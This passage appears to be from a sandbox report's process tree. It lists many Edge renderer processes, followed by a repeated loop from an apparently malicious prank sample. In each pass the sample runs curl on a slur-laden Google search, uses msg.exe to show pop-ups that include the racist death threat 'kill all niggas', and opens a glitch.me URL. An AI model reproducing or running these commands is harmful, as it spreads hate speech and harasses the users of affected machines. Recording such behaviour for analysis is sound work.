        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --always-read-main-dll --field-trial-handle=8476,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=8480 /prefetch:1
        5⤵
        
        PID:244
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --always-read-main-dll --field-trial-handle=8632,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=8640 /prefetch:1
        5⤵
        
        PID:5060
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --always-read-main-dll --field-trial-handle=8916,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=8924 /prefetch:1
        5⤵
        
        PID:2836
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --always-read-main-dll --field-trial-handle=8620,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=9100 /prefetch:1
        5⤵
        
        PID:2300
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --always-read-main-dll --field-trial-handle=9068,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=9292 /prefetch:1
        5⤵
        
        PID:1272
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --always-read-main-dll --field-trial-handle=9460,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=9476 /prefetch:1
        5⤵
        
        PID:3228
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --always-read-main-dll --field-trial-handle=9660,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=9668 /prefetch:1
        5⤵
        
        PID:3664
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --always-read-main-dll --field-trial-handle=9472,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=9624 /prefetch:1
        5⤵
        
        PID:2976
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --always-read-main-dll --field-trial-handle=10020,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=10048 /prefetch:1
        5⤵
        
        PID:5996
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --always-read-main-dll --field-trial-handle=10212,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=10252 /prefetch:1
        5⤵
        
        PID:6380
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --always-read-main-dll --field-trial-handle=10408,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=10400 /prefetch:1
        5⤵
        
        PID:6744
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --always-read-main-dll --field-trial-handle=10608,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=10628 /prefetch:1
        5⤵
        
        PID:6980
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --always-read-main-dll --field-trial-handle=10624,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=10872 /prefetch:1
        5⤵
        
        PID:6256
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --always-read-main-dll --field-trial-handle=11084,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=10612 /prefetch:1
        5⤵
        
        PID:6628
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --always-read-main-dll --field-trial-handle=11224,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=11276 /prefetch:1
        5⤵
        
        PID:6752
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --always-read-main-dll --field-trial-handle=11052,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=11432 /prefetch:1
        5⤵
        
        PID:6240
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --always-read-main-dll --field-trial-handle=11424,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=11664 /prefetch:1
        5⤵
        
        PID:6828
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --always-read-main-dll --field-trial-handle=11828,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=11832 /prefetch:1
        5⤵
        
        PID:7108
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --always-read-main-dll --field-trial-handle=12024,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=12036 /prefetch:1
        5⤵
        
        PID:6376
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --always-read-main-dll --field-trial-handle=11864,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=12184 /prefetch:1
        5⤵
        
        PID:6588
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --always-read-main-dll --field-trial-handle=12368,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=12384 /prefetch:1
        5⤵
        
        PID:6572
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --always-read-main-dll --field-trial-handle=12528,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=12560 /prefetch:1
        5⤵
        
        PID:1124
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --always-read-main-dll --field-trial-handle=12720,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=12776 /prefetch:1
        5⤵
        
        PID:6148
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --always-read-main-dll --field-trial-handle=12936,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=12916 /prefetch:1
        5⤵
        
        PID:7188
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --always-read-main-dll --field-trial-handle=13256,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=13280 /prefetch:1
        5⤵
        
        PID:7464
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --always-read-main-dll --field-trial-handle=13532,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=13540 /prefetch:1
        5⤵
        
        PID:7704
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --always-read-main-dll --field-trial-handle=13696,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=13704 /prefetch:1
        5⤵
        
        PID:8116
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --always-read-main-dll --field-trial-handle=13708,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=13924 /prefetch:1
        5⤵
        
        PID:7332
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --always-read-main-dll --field-trial-handle=13904,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=14080 /prefetch:1
        5⤵
        
        PID:7648
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=56 --always-read-main-dll --field-trial-handle=14324,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=14400 /prefetch:1
        5⤵
        
        PID:6512
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --always-read-main-dll --field-trial-handle=14524,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=14520 /prefetch:1
        5⤵
        
        PID:7236
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=58 --always-read-main-dll --field-trial-handle=14720,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=14232 /prefetch:1
        5⤵
        
        PID:1076
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=59 --always-read-main-dll --field-trial-handle=14892,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=14704 /prefetch:1
        5⤵
        
        PID:7560
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --always-read-main-dll --field-trial-handle=15400,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=15424 /prefetch:1
        5⤵
        
        PID:7652
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=61 --always-read-main-dll --field-trial-handle=15864,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=15852 /prefetch:1
        5⤵
        
        PID:7636
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=62 --always-read-main-dll --field-trial-handle=16040,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=16024 /prefetch:1
        5⤵
        
        PID:7532
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=63 --always-read-main-dll --field-trial-handle=16280,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=16288 /prefetch:1
        5⤵
        
        PID:7584
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=64 --always-read-main-dll --field-trial-handle=16504,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=16520 /prefetch:1
        5⤵
        
        PID:7536
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=65 --always-read-main-dll --field-trial-handle=16540,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=16684 /prefetch:1
        5⤵
        
        PID:8216
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=66 --always-read-main-dll --field-trial-handle=16880,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=16864 /prefetch:1
        5⤵
        
        PID:8396
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=67 --always-read-main-dll --field-trial-handle=17056,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=17076 /prefetch:1
        5⤵
        
        PID:8676
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=68 --always-read-main-dll --field-trial-handle=17252,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=17232 /prefetch:1
        5⤵
        
        PID:8904
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=69 --always-read-main-dll --field-trial-handle=17432,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=17448 /prefetch:1
        5⤵
        
        PID:9176
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=70 --always-read-main-dll --field-trial-handle=17608,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=17616 /prefetch:1
        5⤵
        
        PID:8408
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=71 --always-read-main-dll --field-trial-handle=17872,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=17880 /prefetch:1
        5⤵
        
        PID:8656
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=72 --always-read-main-dll --field-trial-handle=18084,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=17612 /prefetch:1
        5⤵
        
        PID:9036
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=73 --always-read-main-dll --field-trial-handle=17936,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=18260 /prefetch:1
        5⤵
        
        PID:8340
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=74 --always-read-main-dll --field-trial-handle=18412,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=18404 /prefetch:1
        5⤵
        
        PID:8844
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=75 --always-read-main-dll --field-trial-handle=18556,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=18592 /prefetch:1
        5⤵
        
        PID:8308
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=76 --always-read-main-dll --field-trial-handle=18740,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=17860 /prefetch:1
        5⤵
        
        PID:8860
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=77 --always-read-main-dll --field-trial-handle=18920,i,14647950498324106405,1387135340983042430,262144 --variations-seed-version --mojo-platform-channel-handle=18904 /prefetch:1
        5⤵
        
        PID:8864
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:3368
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:5152
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:2464
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:4796
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:1420
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:4500
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:484
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:5448
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:5492
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:1196
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:4888
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:4520
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:3576
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:4100
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:1136
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:2352
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:6064
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:320
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:664
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:3352
